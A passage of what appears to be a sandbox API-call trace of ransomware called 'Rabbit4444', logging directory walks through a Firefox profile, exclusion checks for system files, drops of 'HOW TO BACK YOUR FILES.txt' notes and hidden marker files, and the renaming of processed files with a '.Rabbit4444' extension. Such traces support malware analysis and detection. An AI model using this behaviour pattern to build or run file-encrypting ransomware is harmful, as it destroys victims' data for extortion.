lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.075] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.075] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.075] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.075] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.075] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe85beac2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe85beac2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe85beac2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.075] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.075] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.075] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe85beac2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe85beac2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe85beac2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.075] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0052.075] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.075] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\minidumps\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.076] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.076] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.077] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.077] CloseHandle (hObject=0x278) returned 1 [0052.077] CloseHandle (hObject=0x27c) returned 1 [0052.077] GetCurrentThreadId () returned 0xd98 [0052.077] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6450 [0052.077] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm" [0052.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefd18 | out: hHeap=0xe0000) returned 1 [0052.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6448 | out: hHeap=0xe0000) returned 1 [0052.077] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm" [0052.077] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\" [0052.077] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\.BFC0E91B00AE8A0620D3" [0052.077] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.078] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.081] FlushFileBuffers (hFile=0x27c) returned 1 [0052.082] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.082] CloseHandle (hObject=0x27c) returned 1 [0052.082] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm") returned 89 [0052.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.082] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe85e4c26, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0052.082] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.082] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.082] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.083] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.083] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe85e4c26, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.083] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.083] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.083] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.083] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.083] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.083] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe85e4c26, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe85e4c26, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe85e4c26, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.083] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.083] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.083] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x5b71e56, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.4.8.903", cAlternateFileName="148~1.903")) returned 1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2="Rabbit4444.exe") returned -1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2=".") returned 1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2="..") returned 1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2="windows") returned -1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2="bootmgr") returned -1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2="pagefile.sys") returned -1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2="boot") returned -1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2="ids.txt") returned -1 [0052.083] lstrcmpiW (lpString1="1.4.8.903", lpString2="NTUSER.DAT") returned -1 [0052.083] lstrcpyW (in: lpString1=0x130ebec, lpString2="1.4.8.903" | out: lpString1="1.4.8.903") returned="1.4.8.903" [0052.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0052.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x115f70 [0052.083] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6490 [0052.083] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x5b71e56, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.4.8.903", cAlternateFileName="148~1.903")) returned 0 [0052.083] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0052.083] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.083] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.085] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.085] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.086] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.086] CloseHandle (hObject=0x278) returned 1 [0052.086] CloseHandle (hObject=0x27c) returned 1 [0052.086] GetCurrentThreadId () returned 0xd98 [0052.086] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.086] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" [0052.086] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115f70 | out: hHeap=0xe0000) returned 1 [0052.086] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.086] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" [0052.086] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\" [0052.086] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3" [0052.086] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.089] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.091] FlushFileBuffers (hFile=0x27c) returned 1 [0052.092] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.093] CloseHandle (hObject=0x27c) returned 1 [0052.093] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903") returned 99 [0052.093] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.093] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5b71e56, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe85e4c26, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.093] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.093] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.093] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.093] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.093] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5b71e56, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe85e4c26, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.093] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.093] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.093] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.093] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.093] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.093] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe85e4c26, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe85e4c26, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe85e4c26, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.094] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.094] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.094] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5afa3b9, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LICENSE.txt", cAlternateFileName="")) returned 1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2="Rabbit4444.exe") returned -1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2=".") returned 1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2="..") returned 1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2="windows") returned -1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2="bootmgr") returned 1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2="pagefile.sys") returned -1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2="boot") returned 1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2="ids.txt") returned 1 [0052.094] lstrcmpiW (lpString1="LICENSE.txt", lpString2="NTUSER.DAT") returned -1 [0052.094] lstrcpyW (in: lpString1=0x130ec00, lpString2="LICENSE.txt" | out: lpString1="LICENSE.txt") returned="LICENSE.txt" [0052.094] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt", dwFileAttributes=0x0) returned 1 [0052.094] lstrlenW (lpString="LICENSE.txt") returned 11 [0052.094] lstrlenW (lpString="Rabbit4444") returned 10 [0052.094] lstrcmpiW (lpString1="ICENSE.txt", lpString2="Rabbit4444") returned -1 [0052.094] lstrlenW (lpString=".dll") returned 4 [0052.094] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0052.094] lstrlenW (lpString=".lnk") returned 4 [0052.094] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0052.094] lstrlenW (lpString=".ini") returned 4 [0052.094] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0052.094] lstrlenW (lpString=".sys") returned 4 [0052.094] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0052.094] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\license.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.095] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.095] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14340542655) returned 1 [0052.095] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=479) returned 1 [0052.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0052.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0052.095] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x298 [0052.096] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0052.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0052.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0052.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0052.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0052.097] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14340824016) returned 1 [0052.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0052.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0052.098] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.098] CloseHandle (hObject=0x298) returned 1 [0052.098] CloseHandle (hObject=0x278) returned 1 [0052.098] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt.Rabbit4444") returned 122 [0052.098] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\license.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\license.txt.rabbit4444"), dwFlags=0x1) returned 1 [0052.098] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b6f737, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0052.098] lstrcmpiW (lpString1="manifest.json", lpString2="HOW 